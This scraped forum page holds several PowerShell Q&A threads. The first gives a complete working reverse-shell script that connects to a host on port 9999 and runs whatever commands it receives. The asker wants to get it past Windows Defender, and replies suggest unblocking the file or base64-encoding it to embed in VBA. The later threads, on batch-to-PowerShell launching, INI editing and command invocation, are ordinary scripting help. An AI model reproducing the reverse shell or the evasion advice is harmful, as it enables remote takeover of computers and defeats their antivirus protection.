I'm trying to run a powershell reverse shell on windows 10. Anyway everytime it is blocked by Wndows Defender. How can I bypass it?
In a file I store the payload $client = New-Object System.Net.Sockets.TCPClient('192.168.1.54',9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
then I use xencrypt (https://github.com/the-xentropy/xencrypt) to obfuscate the code but when I
run powershell -NoP -NonI -W Hidden -Exec Bypass .\revshell.ps1
I get Questo script include contenuto dannoso ed รจ stato bloccato dal software antivirus.
In riga:18 car:1
+ IEX($piifnga)
+ ~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
QUESTION: is there a way to bypass this check?
Have you tried Unblock-File .\revshell.ps1 before trying to run the reverse shell script (understanding the risks associated with running untrusted code downloaded onto the machine)?
Just encoded it or you can change it to base64 to embed it to vba
Related
I am trying to run the following powershell command from a .bat script
[void] [reflection.assembly]::loadwithpartialname("System.Windows.Forms")
[reflection.assembly]::loadwithpartialname("System.Drawing")
$notify = new-object system.windows.forms.notifyicon
$notify.icon = [System.Drawing.SystemIcons]::Information
$notify.visible = $true
$notify.showballoontip(10,"Copied!","Map names have been copied to the clipboard",[system.windows.forms.tooltipicon]::None)
the code is intended to produce a simple balloon notification in the bottom right hand corner of the screen
I have tested the code in powershell and it works just fine there, however i cant get it to work in cmd / via a .bat script
i dont want to have to point to a seperate powershell file, i need it all to run from within this one script
I have realised that i need to address that this is a powershell script at the beginning of the script so that it runs correctly so i have modified it to the following:
powershell -Command "& {[void] [reflection.assembly]::loadwithpartialname("System.Windows.Forms"); [reflection.assembly]::loadwithpartialname("System.Drawing"); $notify = new-object system.windows.forms.notifyicon; $notify.icon = [System.Drawing.SystemIcons]::Information; $notify.visible = $true; $notify.showballoontip(10,"Copied!","Map names have been copied to the clipboard",[system.windows.forms.tooltipicon]::None);}"
from everything i have read on here for people with similar problems this should work, i can get cmd to run other simple powershell commands which appear to work just fine, such as
powershell -Command "& { Get-Process }"
so what am i doing wrong here?
when i run the above code i get the following error message on cmd
At line:1 char:54
+ & {[void] [reflection.assembly]::loadwithpartialname(System.Windows.F ...
+ ~
Missing ')' in method call.
At line:1 char:54
+ ... eflection.assembly]::loadwithpartialname(System.Windows.Forms); [refl ...
+ ~~~~~~~~~~~~~~~~~~~~
Unexpected token 'System.Windows.Forms' in expression or statement.
At line:1 char:3
+ & {[void] [reflection.assembly]::loadwithpartialname(System.Windows.F ...
+ ~
Missing closing '}' in statement block or type definition.
At line:1 char:74
+ ... flection.assembly]::loadwithpartialname(System.Windows.Forms); [refle ...
+ ~
Unexpected token ')' in expression or statement.
At line:1 char:120
+ ... m.Windows.Forms); [reflection.assembly]::loadwithpartialname(System.D ...
+ ~
Missing ')' in method call.
At line:1 char:120
+ ... s); [reflection.assembly]::loadwithpartialname(System.Drawing); $noti ...
+ ~~~~~~~~~~~~~~
Unexpected token 'System.Drawing' in expression or statement.
At line:1 char:134
+ ... ); [reflection.assembly]::loadwithpartialname(System.Drawing); $notif ...
+ ~
Unexpected token ')' in expression or statement.
At line:1 char:300
+ ... ormation; $notify.visible = $true; $notify.showballoontip(10,Copied!, ...
+ ~
Missing expression after ','.
At line:1 char:300
+ ... n; $notify.visible = $true; $notify.showballoontip(10,Copied!,Map nam ...
+ ~~~~~~~
Unexpected token 'Copied!' in expression or statement.
At line:1 char:307
+ ... ; $notify.visible = $true; $notify.showballoontip(10,Copied!,Map name ...
+ ~
Missing argument in parameter list.
Not all parse errors were reported. Correct the reported errors and try again.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : MissingEndParenthesisInMethodCall
is it something to do with the syntax i am using? maybe to do with spaces or something?
You can embed your PowerShell script and execute it from a batch file with this hybrid method, and you will don't worry about any escape special character anymore :
<# : Batch Script Section
#rem # The previous line does nothing in Batch, but begins a multiline comment block in PowerShell. This allows a single script to be executed by both interpreters.
#echo off
Title Embed And Execute Powershell Script with a Batch file in Hybrid Mode & Mode 70,3
cd "%~dp0"
Color 1B & echo( & Echo(
Echo( Please Wait ... Loading PowerShell script is in progress ...
Powershell -executionpolicy bypass -Command "Invoke-Expression $([System.IO.File]::ReadAllText('%~f0'))"
EndLocal
pause
goto:eof
#>
# Powershell Script Section begin here...
# Here we execute our powershell commands...
[void] [reflection.assembly]::loadwithpartialname("System.Windows.Forms")
[reflection.assembly]::loadwithpartialname("System.Drawing") | Out-Null
$notify = new-object system.windows.forms.notifyicon
$notify.icon = [System.Drawing.SystemIcons]::Information
$notify.visible = $true
$notify.showballoontip(10,"Copied!","Map names have been copied to the clipboard",[system.windows.forms.tooltipicon]::None)
Here is an example that I used this hybrid method : SpeedTest_Hackoo_Ookla.bat
I am not familiar with PowerShell and I am struggling at the outset.
My task I want to achieve:
Get version number from EXE file.
I know I can get that:
(Get-Item "MeetSchedAssistSetup.exe").VersionInfo.ProductVersionRaw
In the console window it displays:
Major Minor Build Revision
----- ----- ----- --------
23 0 3 0
Open a INI file. I installed the PSIni module but this line fails:
$ini = Get-IniContent version_meetschedassist2.ini
It says:
Get-IniContent : The 'Get-IniContent' command was found in the module 'PsIni', but the module could not be loaded. For
more information, run 'Import-Module PsIni'.
At line:1 char:8
+ $ini = Get-IniContent version_meetschedassist2.ini
+ ~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Get-IniContent:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CouldNotAutoloadMatchingModule
How do I load the INI?
My task it to update this bit in the INI:
[MeetSchedAssist Update]
LatestVersion=23.03
LatestVersionString=23.0.3
So I want to:
Open INI
Extract Version from EXE
Update the two INI values from the Version
Save INI
I tried using Import-Module:
Import-Module : File C:\Program Files\WindowsPowerShell\Modules\PsIni\3.1.3\PsIni.psm1 cannot be loaded because running scripts is disabled on
this system. For more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module PsIni
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [Import-Module], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
No joy.
Here's a very quick and very dirty way of doing this just as an example:
$exe_info = Get-Item -Path '.\MeetSchedAssistSetup.exe'
$ini_path = '.\version_meetschedassist2.ini'
$ini = Get-IniContent -FilePath $ini_path
$ini['MeetSchedAssist Update']['LatestVersion'] =
'{0}.{1}{2}' -f $exe_info.VersionInfo.FileMajorPart,
$exe_info.VersionInfo.FileMinorPart, $exe_info.VersionInfo.FileBuildPart
$ini['MeetSchedAssist Update']['LatestVersionString'] =
'{0}.{1}.{2}' -f $exe_info.VersionInfo.FileMajorPart,
$exe_info.VersionInfo.FileMinorPart, $exe_info.VersionInfo.FileBuildPart
Out-IniFile -FilePath $ini_path -InputObject $ini -Force
Since Get-IniContent gets saved into memory via $ini, you can replace the values with what you need them to be and pass it back out with Out-IniFile specifying $ini as the -InputObject for it. The values are updated using string concatenating of the version info.
I have an old script that invokes itself with some extra params in a certain situation. This works if run through a regular powershell window
$spath = $script:MyInvocation.MyCommand.Path
$FilePathWithQuotes = '"{0}"' -f $spath
powershell -file $FilePathWithQuotes -NestedCall #ExtraArgs
but if it's run through the ISE I get this error.
powershell : Add-Type : Cannot bind parameter 'Path' to the target.
Exception setting "Path": "Cannot find path At D:\Deploy\File
Deploy.ps1:39 char:5
+ powershell -file $FilePathWithQuotes -NestedCall #ExtraArgs
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (Add-Type : Cann...nnot find path :String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
I added the second line to make sure the spaces weren't the issue but it still fails in the ISE.
Thoughts? Im on ps 5.1
Yeah, check for $PSISE, and use that if possible.
$spath = If($PSISE){$psISE.CurrentFile.FullPath}else{$script:MyInvocation.MyCommand.Path}
$FilePathWithQuotes = '"{0}"' -f $spath
powershell -file $FilePathWithQuotes -NestedCall #ExtraArgs
this is probably an easy answer for you experts but not sure the best command to use. I want to execute the following command from within powershell :
stccmd -rh sldcege-mie003 -rs nsccahs_dev -un Administrator -up STC -cb nsccahs_dev_cb -cmd "status bobRRC_ADT_OUT_FMT"
and return the result.
The code i have so far is :
$sCmd = #'
"stccmd -rh sldcege-mie003 -rs nsccahs_dev -un Administrator -up STC -cb
nsccahs_dev_cb -cmd '\"status bobRRC_ADT_OUT_FMT\"'"
'#
$Result = Invoke-Command $sCmd | Out-String
The error i am getting is :
Invoke-Command : Parameter set cannot be resolved using the specified named par
ameters.
At E:\Andrew\MonitoreGate.ps1:20 char:25
+ $Result = Invoke-Command <<<< $sCmd | Out-String
+ CategoryInfo : InvalidArgument: (:) [Invoke-Command], Parameter
BindingException
+ FullyQualifiedErrorId : AmbiguousParameterSet,Microsoft.PowerShell.Comma
nds.InvokeCommandCommand
If i use Invoke-Expression, instead i get the following :
Invoke-Expression : Unexpected token 'status' in expression or statement.
At E:\Andrew\MonitoreGate.ps1:20 char:28
+ $Result = Invoke-Expression <<<< $sCmd | Out-String
+ CategoryInfo : ParserError: (status:String) [Invoke-Expression]
, ParseException
+ FullyQualifiedErrorId : UnexpectedToken,Microsoft.PowerShell.Commands.In
vokeExpressionCommand
Should i be using Invoke-Command or Invoke-Expression or some other way? Is the $sCmd structure correct in regards to quotes?
The program is to run on same machine (not remotely).
Any help greatly appreciated,
Andrew
neither, instead use:
Start-Process -FilePath 'path_to_stccmd.exe' -ArgumentList "-rh sldcege-mie003 -rs nsccahs_dev -un Administrator -up STC -cb nsccahs_dev_cb -cmd 'status bobRRC_ADT_OUT_FMT'" -nonewwindow
if you dont see the output using the above...try this:
$exepath = 'path_to_stccmd.exe'
&$exepath arguments
I have a script that requires 3 mandatory input parameters that will be used to run the backup command for tdpsql.
type (FULL, DIFF or LOG)
SQLServerinstancename
Database (SYSTEM, ALL, )
Within the powershell script I have the following line
$cmd = "C:\Progra~1\Tivoli\TSM\TDPSql\tdpsqlc.exe backup " + $idatabase + " " + $action + " " + $parameter + " /LOGFILE=" + $logdir + $logfile + "" $tdpsqlexe - The tdpsqlc exe.
$idatabase - Database name
$action = FULL\DIFF\LOG
$parameter = /sqlserver=TCP:" + $sqlserverinstance + " /SQLAUTH=INT /TSMOPTFile='" + $dsmoptfilename + "' /EXCLUDEDB=" + $exclude
& $cmd
When I echo the command it reports out what I use to run it using powershell command line but when I try to run it from Powershell with the & it fails with the following
The term
C:\Progra~1\Tivoli\TSM\TDPSql\tdpsqlc.exe
backup master FULL
/sqlserver=TCP:
/SQLAUT H=INT
/TSMOPTFile=C:\Progra~1\Tivoli\TSM\TDPSql\dsm.opt /EXCLUDEDB=tempdb /LOGFILE=<logfile>
is not recognized as the name of a
cmdlet, function, script file, or
operable program.Check the spelling of
the name, or if a path was included,
verify that the path is correct and
try again. At TDPSQLBackup.ps1:166
char:6
+ & <<<< $cmd >> test2.txt
+ CategoryInfo : ObjectNotFound:
(C:\Progra~1\Tiv...forsqlimran.txt:String)
[], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
Any help will be really appreciated.
You might try Invoke-Expression $cmd instead of & $cmd.
Yes better use Invoke-Expression, but if you still want to use & you can do it in this way.
$cmd = "C:\Windows\System32\notepad.exe"
$params = "C:\temp\file.txt"
& $cmd $params
Using a var for program file ans a var for parameters.
Instead of running a batch command you'd better try Powershell cmdlets as follow
import-module "C:\Program Files\Tivoli\Flashcopymanager\fmmodulemmc.dll"
import-module "C:\Program Files\Tivoli\Flashcopymanager\fmmoduleSQL.dll"
$startTime = get-date
Backup-DpSqlComponent -Name AdventureWorks2012 -BackupDestination TSM -BackupMethod Legacy -Full
$endTime = get-date
$activity = Get-FcmMmcActivity -StartTime $startTime -EndTime $endTime
$activity
Reference link
http://www-01.ibm.com/support/docview.wss?uid=swg21974345